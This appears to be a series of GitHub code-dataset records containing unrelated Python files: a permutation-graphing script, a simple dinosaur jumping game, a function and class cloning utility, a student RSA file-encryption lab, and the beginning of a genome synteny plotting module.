create_transpositions_list(current_list, current_length, target_length):\n if current_length == target_length:\n SOLUTIONS_LIST.append(current_list)\n return None\n for pos in range(len(current_list)+1):\n new_list = []\n for i in range(pos):\n new_list.append(current_list[i]+1)\n for i in range(current_length):\n new_list.append(i)\n for i in range(len(current_list)-pos):\n new_list.append(current_list[i+pos])\n create_transpositions_list(\n new_list, current_length+1, target_length)\n\n\ndef create_full_transpositions_list(current_list, current_result):\n length = len(current_result.keys())\n for i in range(length-1):\n # if i > len(current_list):\n # break\n if len(current_list) > 0 and i > current_list[-1]+1:\n break\n # if len(current_list) > length-1 and current_list[-1] == length-2 and current_list[1-length] == 0 and current_list[-length] < i:\n # break\n temp_low = current_result.get(i)\n temp_high = current_result.get(i+1)\n if temp_low < temp_high:\n new_list = current_list.copy()\n new_list.append(i)\n current_result.update({i+1: temp_low})\n current_result.update({i: temp_high})\n create_full_transpositions_list(new_list, current_result)\n current_result.update({i+1: temp_high})\n current_result.update({i: temp_low})\n 
flatten = tuple(current_list)\n if(len(current_list) == (((length-1)**2+length-1)/2)):\n if not flatten in EQUIVALENCE_DUMP:\n for equiv_list in create_all_equiv(current_list):\n EQUIVALENCE_DUMP.add(tuple(equiv_list))\n SOLUTIONS_LIST.append(current_list)\n\n\ndef graph_transposition_list(transposition_list):\n net = pyvis.network.Network(notebook=True)\n graph = nx.Graph()\n active_vertex_list = []\n next_vertex = 0\n slots = math.ceil((len(transposition_list)/2)**(1/2))\n for i in range(slots):\n active_vertex_list.append(next_vertex)\n graph.add_node(next_vertex)\n next_vertex += 1\n for element in transposition_list:\n if element % 2 == 0:\n previous_vertex = active_vertex_list[int(element/2)]\n active_vertex_list[int(element/2)] = next_vertex\n graph.add_edge(previous_vertex, next_vertex)\n next_vertex += 1\n else:\n graph.add_edge(\n active_vertex_list[int((element-1)/2)], active_vertex_list[int((element+1)/2)])\n print(graph.nodes())\n print(graph.edges())\n net.from_nx(graph)\n file_name = 'output/graph'+str(transposition_list)+'.html'\n net.show(file_name)\n # nx.draw(graph, with_labels=True, font_weight='bold')\n\n\nif __name__ == '__main__':\n # print([i for i in create_all_equiv([int(i)\n # for i in sys.argv[1].split(\",\")])])\n # SOLUTIONS_LIST.append([int(i) for i in sys.argv[1].split(\",\")])\n\n starting_arrangement = {}\n for i in range(int(sys.argv[1])):\n starting_arrangement.update({i: i})\n create_full_transpositions_list([], starting_arrangement)\n # create_transpositions_list([], 1, int(sys.argv[1]))\n # print(SOLUTIONS_LIST)\n if(len(sys.argv) > 2):\n for transposition_list in SOLUTIONS_LIST:\n graph_transposition_list(transposition_list)\n print(len(SOLUTIONS_LIST))\n\n # print(\"\\n \", SOLUTIONS_LIST[0])\n # print(\"vx form = \", vertex_form(SOLUTIONS_LIST[0]))\n # create_pools(SOLUTIONS_LIST[0])\n # a = sort_and_make(SOLUTIONS_LIST[0])\n # print(a)\n # bitmasks = all_bitmasks(SOLUTIONS_LIST[0], False)\n # for bitmask in bitmasks:\n # print(f'{bitmask[0]:<8}', bitmask[1])\n # graph_transposition_list(SOLUTIONS_LIST[0])\n","repo_name":"SDhn2a/math400","sub_path":"geodesic_permutations.py","file_name":"geodesic_permutations.py","file_ext":"py","file_size_in_byte":14596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38753715697","text":"from turtle import Screen\r\nimport pgzrun\r\nfrom pgzhelper import *\r\n\r\nWIDTH=750 \r\nHEIGHT=475\r\nchuongngaivat=[]\r\ntxuathien=0\r\ndiem=0\r\nnhaylen=0\r\nroixuong=1\r\nketthuc=False\r\n\r\n\r\nphongnen=Actor('background') #Them_background\r\nkhunglong=Actor('run1') #Them hinh con khung long\r\nkhunglong.x=100 #toa do\r\nkhunglong.y=400\r\nhoatanhchay=['run1','run2','run3','run4','run5','run6','run7','run8'] #hoat anh chay\r\nkhunglong.images=hoatanhchay\r\n\r\ndef update():\r\n global txuathien, diem, nhaylen, roixuong, ketthuc, chuongngaivat\r\n khunglong.next_image() # Chuyen hinh anh run1->run2->...run7\r\n txuathien+=1\r\n if txuathien > 100:\r\n xuongrong=Actor('catus') #Them hinh anh xuong rong\r\n xuongrong.x=900 #Toa do xuong rong\r\n xuongrong.y=370\r\n chuongngaivat.append(xuongrong)\r\n txuathien=0\r\n for xuongrong in chuongngaivat: #hoat anh xuong rong di chuyen\r\n xuongrong.x-=10\r\n if xuongrong.x<80: #cach tinh diem\r\n diem+=1\r\n chuongngaivat.remove(xuongrong)\r\n if keyboard.up and khunglong.y==400 : #hoat anh nhay\r\n nhaylen=-25\r\n sounds.impact.play()\r\n khunglong.y+=nhaylen\r\n nhaylen+=roixuong\r\n if khunglong.y>400: #gooi han do 
cao\r\n nhaylen=0\r\n khunglong.y=400\r\n if khunglong.collidelist(chuongngaivat)!=-1: #cach tinh va cham\r\n ketthuc=True\r\n chuongngaivat.remove(xuongrong)\r\n sounds.gameover.play()\r\n if keyboard.space: #bat dau lai\r\n ketthuc=False\r\n diem=0\r\n chuongngaivat=[]\r\n\r\n \r\n\r\n\r\ndef draw():\r\n phongnen.draw() # Ve background\r\n\r\n if ketthuc:\r\n screen.draw.text( 'Game over',(280,200),color=(0,0,0),fontsize=50)\r\n screen.draw.text('Diem so:'+ str(diem),(280,230),color=(0,0,0),fontsize=50)\r\n screen.draw.text( 'Nhan SPACE de bat dau lai',(170,270),color=(255,0,255),fontsize=50)\r\n\r\n else:\r\n khunglong.draw()\r\n for xuongrong in chuongngaivat:\r\n xuongrong.draw()\r\n screen.draw.text('DIEM SO: '+ str(diem),(10,15),color=(255,0,255),fontsize=35)\r\npgzrun.go() #Khoi chay\r\n","repo_name":"TrucLoann/KTLTrinh","sub_path":"Final code.py","file_name":"Final code.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19997238776","text":"from inspect import isfunction\nfrom sys import version_info\nfrom types import FunctionType\n\nfrom flatmirror import (flatmirror, ABCMeta, next, partial,\n _get_meta_params, _get_registered_cls)\n\n__all__ = ('clonecls', 'clonefunc', 'clone', 'flatmirror',\n 'ContainsAll', 'IdentContainer')\n\n\n# Constants and builtins:\n\nif version_info[0] >= 3:\n import builtins\n FUNC_ATTR_MAP = {\n '__globals__': '__globals__',\n '__closure__': '__closure__',\n '__code__': '__code__',\n }\n basestring = str\nelse:\n import __builtin__ as builtins\n FUNC_ATTR_MAP = {\n '__globals__': 'func_globals',\n '__closure__': 'func_closure',\n '__defaults__': 'func_defaults',\n '__code__': 'func_code',\n '__dict__': 'func_dict',\n }\nBUILTIN_OBJS = vars(builtins).values()\nSOME_FUNC_ATTRS = [FUNC_ATTR_MAP.get(a, a)\n for a in ('__defaults__', '__doc__',\n '__module__', '__name__')]\nSOME_FUNC_DICTS = [FUNC_ATTR_MAP.get(a, a)\n for a in ('__dict__', '__annotations__', '__kwdefaults__')]\n\n\n# Auxiliary types:\n\nclass IdentContainer(object):\n \"\"\"Simple container with identity-based 'in'-test.\"\"\"\n def __init__(self, actual_container):\n \"\"\"Initialize with an actual container.\"\"\"\n self.actual_container = actual_container\n def __contains__(self, key):\n for obj in self.actual_container:\n if obj is key:\n return True\n return False\n\nclass ContainsAll(object):\n \"\"\"Dummy container -- always returning True for 'in'-test.\"\"\"\n def __contains__(self, key):\n return True\n\n\n# Public functions:\n\ndef clonefunc(func, to_update=None): # side effect on the to_update list!\n \"\"\"Clone a given function (for user-defined only, i.e. 
not builtins etc.).\n\n Arguments:\n * func\n -- the function to be cloned;\n * to_update [default: None]\n -- if a list or True given, all function dicts (globals, function\n __dict__, kw-defaults, annotations) will be copied using their\n copy() methods; additionaly, for a list, all copied dictionaries\n will be appended to that list.\n\n See clonetools/test.py for some usage examples.\n \"\"\"\n func_globals = getattr(func, FUNC_ATTR_MAP['__globals__'])\n lets_append = isinstance(to_update, list)\n if lets_append or to_update:\n func_globals = func_globals.copy()\n if lets_append:\n to_update.append(func_globals)\n newfunc = FunctionType(getattr(func, FUNC_ATTR_MAP['__code__']),\n func_globals,\n closure=getattr(func, FUNC_ATTR_MAP['__closure__']))\n for attr in SOME_FUNC_ATTRS:\n setattr(newfunc, attr, getattr(func, attr))\n for attr in SOME_FUNC_DICTS:\n a_dict = getattr(func, attr, None)\n if a_dict is not None:\n if lets_append or to_update:\n a_dict = a_dict.copy()\n if lets_append:\n to_update.append(a_dict)\n setattr(newfunc, attr, a_dict)\n return newfunc\n\n\ndef clonecls(cls, slots=None, exclude=('__dict__', '__weakref__'),\n to_clone=None, dict_factory=None, metacls=None,\n metacls_kwargs=None, register='abc', ignore_base_err=False):\n \"\"\"Clone a given class (typically cloning also its bases, except builtins).\n\n Arguments:\n * cls\n -- the class to be cloned;\n * slots [default: None]\n -- if not None, __slots__ attribute is added to the cloned class\n and its cloned superclasses; the actual argument content is added\n to the highest possible class in the hierarchy, the remaining __slots__\n attributes are left empty; all __slots__ contents found in classes are\n preserved;\n * exclude [default: ('__dict__', '__weakref__')]\n -- a sequence of names of attributes that should not be mirrored/cloned;\n * to_clone [default: all superclasses of cls (excluding cls)]\n -- a container of superclasses that should be cloned (excluding cls);\n * dict_factory [default: type(cls.__dict__); but dict if it was dictproxy]\n -- a factory (type/function) to make the __dict__ attribute of the\n created class;\n * metacls [default: type(cls)]\n -- a factory (metaclass) to be used to create the class;\n * metacls_kwargs [default: {}]\n -- keyword arguments for that metaclass;\n * register [default: 'abc']\n -- a callable to be called with the newly created class as the argument,\n or 'abc' -- call cls.register only if isinstance(cls, abc.ABCMeta),\n or True -- call cls.register (unconditionally),\n or False -- do not call anything (unconditionally);\n * ignore_base_err [default: False]\n -- if true, ignore Atribute|TypeErrors occuring when a base class\n is being cloned: instead of raising exceptions, return original\n class objects.\n \"\"\"\n to_update = []\n old2new_classes = {}\n if slots is not None:\n if isinstance(slots, basestring):\n slots = (slots,)\n slots = list(slots)\n if to_clone is not None:\n to_clone = IdentContainer((cls,) + tuple(to_clone))\n else:\n to_clone = ContainsAll()\n new_cls = _clone_cls(cls, slots, to_update, old2new_classes,\n exclude, to_clone, dict_factory,\n metacls, metacls_kwargs, ignore_base_err)\n if new_cls is cls:\n raise TypeError('%r cannot be cloned' % cls)\n for a_dict in to_update:\n for k, obj in a_dict.items():\n for old, new in old2new_classes.items():\n if obj is old:\n a_dict[k] = new\n break\n return _get_registered_cls(new_cls, cls, register)\n\n\ndef clone(*args, **kwargs):\n \"\"\"Call clonefunc()/clonecls() (depending on the first 
argument type).\"\"\"\n if isfunction(args[0]):\n return clonefunc(*args, **kwargs)\n else:\n return clonecls(*args, **kwargs)\n\n\n# Non-public functions:\n\ndef _get_newslots_and_excl(cls, slots, exclude):\n cls_slots = getattr(cls, '__slots__', None)\n if cls_slots is not None:\n if isinstance(cls_slots, basestring):\n cls_slots = (cls_slots,)\n excl = set(exclude).union(cls_slots)\n new_slots = list(cls_slots)\n if slots is not None:\n new_slots.extend(slots)\n else:\n excl = set(exclude)\n if slots is not None:\n new_slots = list(slots)\n else:\n new_slots = None\n excl.add('__slots__')\n return new_slots, excl\n\ndef _clone_cls(cls, # side effect on these\n slots, to_update, old2new_classes, # <- mutable arguments!\n exclude, to_clone, dict_factory,\n metacls, metacls_kwargs, ignore_base_err,\n _builtin_objs=IdentContainer(BUILTIN_OBJS)):\n if cls not in to_clone or cls in _builtin_objs:\n return cls\n try:\n (bases # recursion:\n ) = tuple(_clone_cls(basecls, slots, to_update, old2new_classes,\n exclude, to_clone, dict_factory,\n metacls, metacls_kwargs, ignore_base_err)\n for basecls in cls.__bases__)\n old2new_classes.update((old, new)\n for old, new in zip(cls.__bases__, bases)\n if old is not new)\n (dict_factory, metacls, metacls_kwargs\n ) = _get_meta_params(cls, dict_factory, metacls, metacls_kwargs)\n attrdict = dict_factory()\n new_slots, to_exclude = _get_newslots_and_excl(cls, slots, exclude)\n if new_slots is not None:\n attrdict['__slots__'] = new_slots\n for attrname, obj in cls.__dict__.items():\n if attrname not in to_exclude:\n if isfunction(obj):\n obj = clonefunc(obj, to_update)\n attrdict[attrname] = obj\n name = getattr(cls, '__name__', '') + '_clone'\n new_cls = metacls(name, bases, attrdict, **metacls_kwargs)\n except (TypeError, AttributeError):\n if ignore_base_err:\n return cls\n raise\n else:\n if slots is not None:\n del slots[:]\n return new_cls\n","repo_name":"zuo/Zuo-s-Recipes-and-Drafts","sub_path":"clonetools/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8283,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"6477836781","text":"#Various imports \r\nimport myEncryption\r\nimport myDecryption\r\nimport os\r\nimport constants\r\nimport RSAEncrypt\r\nimport json\r\nfrom base64 import b64encode, b64decode\r\nfrom cryptography.hazmat.primitives.asymmetric import rsa\r\nfrom cryptography.hazmat.primitives import serialization\r\nfrom cryptography.hazmat.backends import default_backend\r\n\r\n#Beginning of main \r\ndef main():\r\n\twhile(True):\r\n\t\tprint(\"***HJ Corp Encryptor***\")\r\n\t\tprint(\"Select the number of one of the following commands:\")\r\n\t\tprint(\"1) Generate RSA tokens\")\r\n\t\tprint(\"2) Encrypt a file using RSA\")\r\n\t\tprint(\"3) Decrypt a file \")\r\n\t\topCommand = input(\"Choose a command:\")\r\n\t\tif opCommand == \"1\":\r\n\t\t\tRSA_key_path = input(\"Please enter the path where you would like to save the keys and name: \")\r\n\t\t\trsaPrivKey = rsa.generate_private_key(public_exponent=65537, key_size = 2048, backend = default_backend())\r\n\t#Generate public key from privatekey\r\n\t\t\trsaPubKey = rsaPrivKey.public_key()\r\n\t#Serialize keys for file\r\n\t\t\tprivPem = rsaPrivKey.private_bytes(encoding=serialization.Encoding.PEM, format = serialization.PrivateFormat.TraditionalOpenSSL, encryption_algorithm=serialization.NoEncryption())\r\n\t\t\tpubPem = rsaPubKey.public_bytes(encoding=serialization.Encoding.PEM, 
format=serialization.PublicFormat.SubjectPublicKeyInfo)\r\n\t#split path from file name\r\n\t\t\tkPath, kName =os.path.split(RSA_key_path)\r\n\t#Check if path is a directory, create it if it does not exist\r\n\t\t\tif kPath != \"\":\r\n\t\t\t\tos.makedirs(kPath)\r\n\t#if there is no tail, add \"default\" to key path for key gen \r\n\t\t\tif kName == \"\":\r\n\t\t\t\tprint (\"No name entered. default.pem, default.pub will be created in chosen directory\")\r\n\t\t\t\tRSA_key_path = RSA_key_path + \"default\"\r\n\t#Write keys to files\r\n\t\t\tcreateFile = open(RSA_key_path+\".pem\", \"wb\")\r\n\t\t\tcreateFile.write(privPem)\r\n\t\t\tcreateFile.close()\r\n\t\t\tcreateFile = open(RSA_key_path+\".pub\", \"wb\")\r\n\t\t\tcreateFile.write(pubPem)\r\n\t\t\tcreateFile.close()\r\n\t\t\tprint(kName,\".pem and \", kName,\".pub have been created at \",kPath)\r\n\t#User enters encrypt option\r\n\t\telif opCommand =='2':\r\n\t\t\tprint (\"Enter the location of the file you would like to RSA encrypt\")\r\n\t\t\tencryptedFile = promptForFile()\r\n\t\t\tprint (\"Enter location of the public key (.pub extension): \")\r\n\t\t\trsaPath = promptForFile()\r\n\t\t\tRSACipher, cipher, IV, ext = RSAEncrypt.myRSAEncrypt(encryptedFile,rsaPath)\r\n\t#Prompt user for what they would like to save the name as and add custom extension\r\n\t\t\tsaveAs = input(\"Save encrypted file as (will be assigned .cryp extension: \")\r\n\t\t\tfileEncrypted = saveAs + \".cryp\"\r\n\t#Create new file and write cipher text to it\r\n\t\t\tfEncrypt = open(fileEncrypted,\"w\")\r\n\t\t\tfileInfo = {}\r\n\t\t\tfileInfo[\"key\"] = b64encode(RSACipher).decode('utf-8')\r\n\t\t\tfileInfo[\"cipher\"] = b64encode(cipher).decode('utf-8')\r\n\t\t\tfileInfo[\"iv\"] = b64encode(IV).decode('utf-8')\r\n\t\t\tfileInfo[\"ext\"] = ext\r\n\t\t\tjson.dump(fileInfo, fEncrypt)\r\n\t\t\tfEncrypt.close()\r\n\t\t\tprint(\"Encryption complete.\")\r\n\t\telif opCommand == '3':\r\n\t\t\tprint(\"Enter the path of the the file you want to decrypt.\")\r\n\t\t\tdFile = promptForFile()\t\r\n\t\t\tRSACipher, cipher, IV, ext= jsonUnpack(dFile)\r\n\t\t\tprint(\"Enter location of private key(.pem extension):\")\r\n\t\t\tprivPath = promptForFile()\r\n\t\t\tRSAEncrypt.myRSADecrypt(RSACipher, cipher, IV, ext, privPath)\r\n\t\telif opCommand == '4':\r\n\t\t\tprint(\"Exiting...\")\r\n\t\t\tbreak;\r\n\t\telse:\r\n\t\t\tprint(\"Error command\")\t\r\n#End of main\r\n\r\ndef promptForFile():\r\n\t#Prompt to check if file path is valid. E to exit\r\n\twhile(True):\r\n\t\tuserFile = input(\"Enter location of file: \")\r\n\t\tif userFile == \"E\":\r\n\t\t\treturn userFile\r\n\t\tif os.path.isfile(userFile):\r\n\t\t\treturn userFile\r\n\t\telse:\r\n\t\t\tprint (\"File not found!\")\r\ndef jsonUnpack(filepath):\r\n\tjsonFile = open(filepath, 'r')\r\n\tjLoad = json.load(jsonFile)\r\n\tjsonFile.close()\r\n\tjKey = b64decode(jLoad[\"key\"])\r\n\tjCipher = b64decode(jLoad[\"cipher\"])\r\n\tjIV = b64decode(jLoad[\"iv\"])\r\n\tjExt = jLoad[\"ext\"]\r\n\treturn jKey, jCipher, jIV, jExt\r\nif __name__==\"__main__\":\r\n\tmain()\r\n","repo_name":"harditsingh95/378","sub_path":"fileEncryptionLab/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19416631864","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\n\"\"\"\n%prog mcscan.txt all.bed layout.csv\n\nIllustrate MCscan multiple collinearity alignments. Use layout.csv to indicate\nthe positions of tracks. 
For example:\n\n#x, y, rotation, ha, va, color, ratio\n0.5, 0.6, 0, left, center, g\n0.25, 0.7, 45, center, center, m\n\nWith the row ordering corresponding to the column ordering in the MCscan output.\n\nFor \"ha\" (horizontal alignment), accepted values are: left|right|leftalign|rightalign|center|\"\"(empty)\nFor \"va\" (vertical alignment), accepted values are: top|bottom|center|\"\"(empty)\n\"\"\"\n\nimport sys\nimport logging\nimport numpy as np\n\nfrom typing import Optional\n\nfrom jcvi.compara.synteny import BlockFile\nfrom jcvi.formats.bed import Bed\nfrom jcvi.formats.base import DictFile\nfrom jcvi.utils.cbook import human_size\nfrom jcvi.utils.validator import validate_in_choices, validate_in_range\nfrom jcvi.apps.base import OptionParser\n\nfrom jcvi.graphics.glyph import (\n BasePalette,\n Glyph,\n OrientationPalette,\n OrthoGroupPalette,\n RoundLabel,\n)\nfrom jcvi.graphics.base import (\n markup,\n mpl,\n plt,\n savefig,\n Path,\n PathPatch,\n AbstractLayout,\n)\n\n\nHorizontalAlignments = (\"left\", \"right\", \"leftalign\", \"rightalign\", \"center\", \"\")\nVerticalAlignments = (\"top\", \"bottom\", \"center\", \"\")\nCanvasSize = 0.65\n\n\nclass LayoutLine(object):\n def __init__(self, row, delimiter=\",\"):\n self.hidden = row[0] == \"*\"\n if self.hidden:\n row = row[1:]\n args = row.rstrip().split(delimiter)\n args = [x.strip() for x in args]\n self.x = float(args[0])\n validate_in_range(self.x, 0, 1, \"XPosition(x) column\")\n self.y = float(args[1])\n validate_in_range(self.y, 0, 1, \"YPosition(y) column\")\n self.rotation = int(args[2])\n self.ha = args[3]\n validate_in_choices(\n self.ha, HorizontalAlignments, \"HorizontaAlignment(ha) column\"\n )\n self.va = args[4]\n validate_in_choices(self.va, VerticalAlignments, \"VerticalAlignment(va) column\")\n self.color = args[5]\n self.ratio = 1\n if len(args) > 6:\n self.ratio = float(args[6])\n if len(args) > 7:\n self.label = args[7].strip()\n else:\n self.label = None\n\n\nclass Layout(AbstractLayout):\n def __init__(self, filename, delimiter=\",\", seed: Optional[int] = None):\n super(Layout, self).__init__(filename)\n fp = open(filename)\n self.edges = []\n for row in fp:\n if row[0] == \"#\":\n continue\n if row[0] == \"e\":\n args = row.rstrip().split(delimiter)\n args = [x.strip() for x in args]\n a, b = args[1:3]\n if len(args) >= 4 and args[3]:\n blockcolor = args[3]\n else:\n blockcolor = None\n if len(args) >= 5 and args[4]:\n samearc = args[4]\n else:\n samearc = None\n a, b = int(a), int(b)\n assert args[0] == \"e\"\n self.edges.append((a, b, blockcolor, samearc))\n else:\n self.append(LayoutLine(row, delimiter=delimiter))\n\n self.assign_colors(seed=seed)\n\n\nclass Shade(object):\n Styles = (\"curve\", \"line\")\n\n def __init__(\n self,\n ax,\n a,\n b,\n ymid_pad: float = 0.0,\n highlight=False,\n style=\"curve\",\n ec=\"k\",\n fc=\"k\",\n alpha=0.2,\n lw=1,\n zorder=1,\n ):\n \"\"\"Create syntenic wedges between tracks.\n\n Args:\n ax: matplotlib Axes\n a (tuple of floats): ((start_x, start_y), (end_x, end_y))\n b (tuple of floats): ((start_x, start_y), (end_x, end_y))\n ymid_pad (float): Adjustment to y-mid position of Bezier controls, curve style only\n highlight (bool, optional): Plot this shade if color is specified. Defaults to False.\n style (str, optional): Style. Defaults to \"curve\", must be one of\n (\"curve\", \"line\")\n ec (str, optional): Edge color. Defaults to \"k\".\n fc (str, optional): Face color. Defaults to \"k\".\n alpha (float, optional): Transparency. 
Defaults to 0.2.\n lw (int, optional): Line width. Defaults to 1.\n zorder (int, optional): Z-order. Defaults to 1.\n \"\"\"\n fc = fc or \"gainsboro\" # Default block color is grayish\n assert style in self.Styles, \"style must be one of {}\".format(self.Styles)\n a1, a2 = a\n b1, b2 = b\n ax1, ay1 = a1\n ax2, ay2 = a2\n bx1, by1 = b1\n bx2, by2 = b2\n if ax1 is None or ax2 is None or bx1 is None or bx2 is None:\n logging.warning(\"Shade: None found in coordinates, skipping\")\n return\n M, C4, L, CP = Path.MOVETO, Path.CURVE4, Path.LINETO, Path.CLOSEPOLY\n if style == \"curve\":\n ymid1 = (ay1 + by1) / 2 + ymid_pad\n ymid2 = (ay2 + by2) / 2 + ymid_pad\n pathdata = [\n (M, a1),\n (C4, (ax1, ymid1)),\n (C4, (bx1, ymid1)),\n (C4, b1),\n (L, b2),\n (C4, (bx2, ymid2)),\n (C4, (ax2, ymid2)),\n (C4, a2),\n (CP, a1),\n ]\n else:\n pathdata = [(M, a1), (L, b1), (L, b2), (L, a2), (CP, a1)]\n codes, verts = zip(*pathdata)\n path = Path(verts, codes)\n if highlight:\n ec = fc = highlight\n\n pp = PathPatch(path, ec=ec, fc=fc, alpha=alpha, lw=lw, zorder=zorder)\n ax.add_patch(pp)\n\n\nclass Region(object):\n def __init__(\n self,\n ax,\n ext,\n layout,\n bed,\n scale,\n switch=None,\n chr_label=True,\n loc_label=True,\n gene_labels: Optional[set] = None,\n genelabelsize=0,\n pad=0.05,\n vpad=0.015,\n extra_features=None,\n glyphstyle=\"box\",\n glyphcolor: BasePalette = OrientationPalette(),\n ):\n x, y = layout.x, layout.y\n ratio = layout.ratio\n scale /= ratio\n self.y = y\n lr = layout.rotation\n tr = mpl.transforms.Affine2D().rotate_deg_around(x, y, lr) + ax.transAxes\n inv = ax.transAxes.inverted()\n\n start, end, si, ei, chr, orientation, span = ext\n flank = span / scale / 2\n xstart, xend = x - flank, x + flank\n self.xstart, self.xend = xstart, xend\n\n cv = lambda t: xstart + abs(t - startbp) / scale\n hidden = layout.hidden\n\n # Chromosome\n if not hidden:\n ax.plot((xstart, xend), (y, y), color=\"gray\", transform=tr, lw=2, zorder=1)\n\n self.genes = genes = bed[si : ei + 1]\n startbp, endbp = start.start, end.end\n if orientation == \"-\":\n startbp, endbp = endbp, startbp\n\n if switch:\n chr = switch.get(chr, chr)\n if layout.label:\n chr = layout.label\n\n label = \"-\".join(\n (\n human_size(startbp, target=\"Mb\", precision=2)[:-2],\n human_size(endbp, target=\"Mb\", precision=2),\n )\n )\n\n height = 0.012\n self.gg = {}\n # Genes\n for g in genes:\n gstart, gend = g.start, g.end\n strand = g.strand\n if strand == \"-\":\n gstart, gend = gend, gstart\n if orientation == \"-\":\n strand = \"+\" if strand == \"-\" else \"-\"\n\n x1, x2, a, b = self.get_coordinates(gstart, gend, y, cv, tr, inv)\n gene_name = g.accn\n self.gg[gene_name] = (a, b)\n\n color, zorder = (\n glyphcolor.get_color_and_zorder(strand)\n if isinstance(glyphcolor, OrientationPalette)\n else glyphcolor.get_color_and_zorder(gene_name)\n )\n\n if hidden:\n continue\n gp = Glyph(\n ax,\n x1,\n x2,\n y,\n height,\n gradient=False,\n fc=color,\n style=glyphstyle,\n zorder=zorder,\n )\n gp.set_transform(tr)\n if genelabelsize and (not gene_labels or gene_name in gene_labels):\n ax.text(\n (x1 + x2) / 2,\n y + height / 2 + genelabelsize * vpad / 3,\n markup(gene_name),\n size=genelabelsize,\n rotation=25,\n ha=\"left\",\n va=\"center\",\n color=\"lightslategray\",\n )\n\n # Extra features (like repeats)\n if extra_features:\n for g in extra_features:\n gstart, gend = g.start, g.end\n x1, x2, a, b = self.get_coordinates(gstart, gend, y, cv, tr, inv)\n gp = Glyph(\n ax,\n x1,\n x2,\n y,\n height * 3 / 4,\n 
gradient=False,\n fc=\"#ff7f00\",\n style=glyphstyle,\n zorder=2,\n )\n gp.set_transform(tr)\n\n ha, va = layout.ha, layout.va\n\n hpad = 0.02\n if ha == \"left\":\n xx = xstart - hpad\n ha = \"right\"\n elif ha == \"leftalign\":\n xx = 0.5 - CanvasSize / 2 - hpad\n ha = \"right\"\n elif ha == \"right\":\n xx = xend + hpad\n ha = \"left\"\n elif ha == \"rightalign\":\n xx = 0.5 + CanvasSize / 2 + hpad\n ha = \"left\"\n else:\n xx = x\n ha = \"center\"\n\n # Tentative solution to labels stick into glyph\n magic = 40.0\n cc = abs(lr) / magic if abs(lr) > magic else 1\n if va == \"top\":\n yy = y + cc * pad\n elif va == \"bottom\":\n yy = y - cc * pad\n else:\n yy = y\n\n l = np.array((xx, yy))\n trans_angle = ax.transAxes.transform_angles(np.array((lr,)), l.reshape((1, 2)))[\n 0\n ]\n lx, ly = l\n if not hidden:\n bbox = dict(boxstyle=\"round\", fc=\"w\", ec=\"w\", alpha=0.5)\n kwargs = dict(\n ha=ha, va=\"center\", rotation=trans_angle, bbox=bbox, zorder=10\n )\n\n # TODO: I spent several hours on trying to make this work - with no\n # good solutions. To generate labels on multiple lines, each line\n # with a different style is difficult in matplotlib. The only way,\n # if you can tolerate an extra dot (.), is to use the recipe below.\n # chr_label = r\"\\noindent \" + markup(chr) + r\" \\\\ .\" if chr_label else None\n # loc_label = r\"\\noindent . \\\\ \" + label if loc_label else None\n\n chr_label = markup(chr) if chr_label else None\n loc_label = label if loc_label else None\n if chr_label:\n if loc_label:\n ax.text(lx, ly + vpad, chr_label, color=layout.color, **kwargs)\n ax.text(\n lx,\n ly - vpad,\n loc_label,\n color=\"lightslategrey\",\n size=10,\n **kwargs,\n )\n else:\n ax.text(lx, ly, chr_label, color=layout.color, **kwargs)\n\n def get_coordinates(self, gstart, gend, y, cv, tr, inv):\n x1, x2 = cv(gstart), cv(gend)\n a, b = tr.transform((x1, y)), tr.transform((x2, y))\n a, b = inv.transform(a), inv.transform(b)\n return x1, x2, a, b\n\n\ndef ymid_offset(samearc: Optional[str], pad: float = 0.05):\n \"\"\"\n Adjustment to ymid, this is useful to adjust the appearance of the Bezier\n curves between the tracks.\n \"\"\"\n if samearc == \"above\":\n return 2 * pad\n if samearc == \"above2\":\n return 4 * pad\n if samearc == \"below\":\n return -2 * pad\n if samearc == \"below2\":\n return -4 * pad\n return 0\n\n\nclass Synteny(object):\n def __init__(\n self,\n fig,\n root,\n datafile,\n bedfile,\n layoutfile,\n switch=None,\n tree=None,\n extra_features=None,\n chr_label=True,\n loc_label=True,\n gene_labels: Optional[set] = None,\n genelabelsize=0,\n pad=0.05,\n vpad=0.015,\n scalebar=False,\n shadestyle=\"curve\",\n glyphstyle=\"arrow\",\n glyphcolor: BasePalette = OrientationPalette(),\n seed: Optional[int] = None,\n ):\n _, h = fig.get_figwidth(), fig.get_figheight()\n bed = Bed(bedfile)\n order = bed.order\n bf = BlockFile(datafile)\n self.layout = lo = Layout(layoutfile, seed=seed)\n switch = DictFile(switch, delimiter=\"\\t\") if switch else None\n if extra_features:\n extra_features = Bed(extra_features)\n\n exts = []\n extras = []\n for i in range(bf.ncols):\n ext = bf.get_extent(i, order)\n exts.append(ext)\n if extra_features:\n start, end, si, ei, chr, orientation, span = ext\n start, end = start.start, end.end # start, end coordinates\n ef = list(extra_features.extract(chr, start, end))\n\n # Pruning removes minor features with < 0.1% of the region\n ef_pruned = [x for x in ef if x.span >= span / 1000]\n print(\n \"Extracted {0} features \"\n \"({1} after 
